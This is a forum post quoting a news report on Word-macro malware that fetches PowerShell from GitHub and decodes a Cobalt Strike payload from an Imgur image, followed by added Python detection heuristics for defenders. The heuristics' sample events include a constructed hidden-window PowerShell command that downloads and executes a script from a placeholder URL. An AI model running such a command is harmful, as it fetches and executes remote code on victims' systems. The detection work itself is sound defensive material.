silversurfer
A new strand of malware uses Word files with macros to download a PowerShell script from GitHub.
This PowerShell script further downloads a legitimate image file from image hosting service Imgur to decode a Cobalt Strike script on Windows systems.
This week researcher Arkbird has shared details on a new macro-based malware that is evasive and spawns payload in multifaceted steps.
The malware strand which looks "like MuddyWater," according to the researcher, ships as an embedded macro within a legacy Microsoft Word (*.doc) file, in the style of the APT group. [...]
Security researcher Florian Roth from Nextron Systems has additionally added the Indicators of Compromise (IOCs) associated with this malware to MuddyWater IOCs list, and provided YARA rules that can be used to detect the variant in your environment.
The IOCs associated with the macro-laden Word documents used in this campaign are given below:
Source: GitHub-hosted malware calculates Cobalt Strike payload from Imgur pic (www.bleepingcomputer.com)
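The chain the article describes (Word macro spawns PowerShell, PowerShell pulls a script from GitHub, that script pulls an image from Imgur and decodes the next stage) leaves a process-creation trail a defender can triage. Below is an added example for that, not code from the article, the forum post, or the researchers it cites: a few Python heuristics run over constructed Sysmon-style process events. The field names, the constructed command lines and every URL in the sample data (EXAMPLE-ORG, EXAMPLE-REPO, EXAMPLE.png) are placeholders assumed for the demo, not indicators from the campaign; the real IOCs and YARA rules referenced above are not reproduced here.

```python
"""Triage heuristics for the Word macro -> PowerShell -> GitHub/Imgur chain.

Added example, not code from the article or the researchers it cites.
It runs over constructed process-creation events (parent image, image,
command line) such as Sysmon Event ID 1 would supply. The field names
and all sample values below are assumptions for the demo.
"""
import re

# Office binaries that should rarely be the parent of a PowerShell process.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Public hosting services the article names as stage hosts (GitHub, Imgur).
# Constructed list; extend it from your own telemetry.
PUBLIC_HOSTS = ("raw.githubusercontent.com", "github.com", "i.imgur.com", "imgur.com")

# Common PowerShell download primitives.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer",
    re.I,
)
# Hidden window plus in-memory execution is a classic macro-dropper signature.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
IEX_RE = re.compile(r"\biex\b|invoke-expression", re.I)

# Constructed sample events (not real telemetry). Event 0 mimics the first
# stage of the chain, event 1 is benign admin activity, event 2 mimics the
# GitHub-hosted script fetching the image from Imgur.
SAMPLE_EVENTS = [
    {
        "parent": "C:\\Program Files\\Microsoft Office\\WINWORD.EXE",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": (
            "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage.ps1')\""
        ),
    },
    {
        "parent": "C:\\Windows\\explorer.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1",
    },
    {
        "parent": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "cmdline": (
            "powershell.exe -c \"$b=(New-Object Net.WebClient)"
            ".DownloadData('https://i.imgur.com/EXAMPLE.png')\""
        ),
    },
]


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return the names of the heuristics an event matches (empty list if none)."""
    hits = []
    cmd = event.get("cmdline", "")
    parent = basename(event.get("parent", ""))
    image = basename(event.get("image", ""))

    if parent in OFFICE_IMAGES and image == "powershell.exe":
        hits.append("office_spawns_powershell")
    if DOWNLOAD_RE.search(cmd) and any(h in cmd.lower() for h in PUBLIC_HOSTS):
        hits.append("download_from_public_host")
    if HIDDEN_RE.search(cmd) and IEX_RE.search(cmd):
        hits.append("hidden_window_iex")
    return hits


def triage(events):
    """Return (index, hits) for every event that matched at least one heuristic."""
    results = []
    for i, event in enumerate(events):
        hits = score_event(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for index, hits in triage(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

None of these heuristics alone is conclusive (admins do download scripts from GitHub), but an Office parent, a hidden window with IEX, and a fetch from a public file host in the same process tree is worth an alert; the hashes and YARA rules the researchers published are the precise match to pair with it.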